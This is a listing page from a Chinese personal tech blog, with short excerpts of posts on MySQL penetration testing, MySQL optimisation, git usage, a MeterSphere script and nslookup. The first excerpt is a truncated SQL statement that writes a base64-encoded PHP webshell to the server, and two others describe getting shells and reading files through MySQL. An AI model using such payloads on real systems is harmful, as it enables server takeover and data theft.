2024-12-29 厉飞雨 阅读(274) 评论(0) 赞(14)

select '<?php file_put_contents("abab.php",base64_decode("Jmx0Oz9waHANCkBlcnJvcl9yZXBvcnRpbmcoMCk7DQpzZXNzaW9uX3N0YXJ0KCk7DQogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7IA0KCS...

2024-12-29 厉飞雨 阅读(309) 评论(0) 赞(13)

前言 === 今天给大家总结一下渗透mysql的一些技巧。本文只是点到为止，不会讲的太细。 一、sqlshell获取 ============ 要利用mysql首先得拿到一个可以执行sql的mysql才能利用，下面就说一下几种常见姿势，欢迎补充。 1、弱口令 这个比较简单，网上工具很多如美杜莎，九头蛇这些比较知名的，msf也有相应的模块。我自己之前也写过一个。要是运气...

2024-12-29 厉飞雨 阅读(311) 评论(0) 赞(14)

MySQL优化 ======= \*\*1. \*\* \*\*避免使用 select \* \*\* 你需要什么信息,就查询什么信息,查询的多了,查询的速度肯定就会慢 **2.** \*\*当你只需要查询出一条数据的时候,要使用 limit 1 \*\* 比如你要查询数据中是否有男生,只要查询一条含有男生的记录就行了,后面不需要再查了,使用Limit 1 可以在找到一条数...

2024-12-29 厉飞雨 阅读(293) 评论(0) 赞(12)

前言 === 随便记录一下笔记,方便查询.最近是想到什么就记什么. 渗透测试mysql ========= 关于如何攻击mysql请直接看这篇\>[Mysql数据库渗透及漏洞利用总结](https://xz.aliyun.com/t/1491)写的很全 拿shell ====== 1前提需要知道网站的真实**物理路径** 2查看是否允许导入导出 ...

2024-12-29 厉飞雨 阅读(277) 评论(0) 赞(12)

说明 === 涨姿势的文章日常分享 [通过MySQL LOAD DATA特性来达到任意文件读取](https://xz.aliyun.com/t/3973)

2024-12-26 厉飞雨 阅读(345) 评论(0) 赞(21)

<p>指令太多记不住，想着直接水一篇文章，以后自己也好找。</p> <p>开发过程中常遇到发现某些新文件，需要移除的时候，我们会更新 <code>.gitignore</code> 文件以来忽略这些文件，但是更新后，只会是之后不再同步，远端仓库依旧有这些文件，所以针对略微强迫症的我，就会有点暴躁。</p> ...

2024-12-26 厉飞雨 阅读(381) 评论(0) 赞(12)

<h2>初始化配置 {#初始化配置}</h2> <p>替换下面的实际名称和邮件地址</p> <p>|-------------|-----------------------------------------------------------------------------------------------|...

2024-12-26 厉飞雨 阅读(289) 评论(0) 赞(11)

<h4>安装 {#安装}</h4> <hr /> <h5>下载 {#下载}</h5> <p>由于国内下载速度慢，推荐使用淘宝镜像</p> <ul> <li> <p>git官网 <a href="https://git-scm.com/"...

2024-12-26 厉飞雨 阅读(465) 评论(0) 赞(14)

<p>将 v3 版本触发测试计划脚本上传到 GitLab 的仓库里，点击下载 <a href="/upload/metersphere/runMSv3TestPlan.sh">runMSv3TestPlan.sh</a></p> <p><img src="/upload/上传脚本.p...

2024-12-26 厉飞雨 阅读(419) 评论(0) 赞(12)

<p>执行nslookup向DNS服务器发出命令，查找域名的IP地址</p> <p>Windows系统打开cmd命令提示符直接执行即可，Linux红帽系列系统可以安装bind-utils包获取nslookup命令，如下所示。<br /> nslookup github.global.ssl.fastly.net</p>...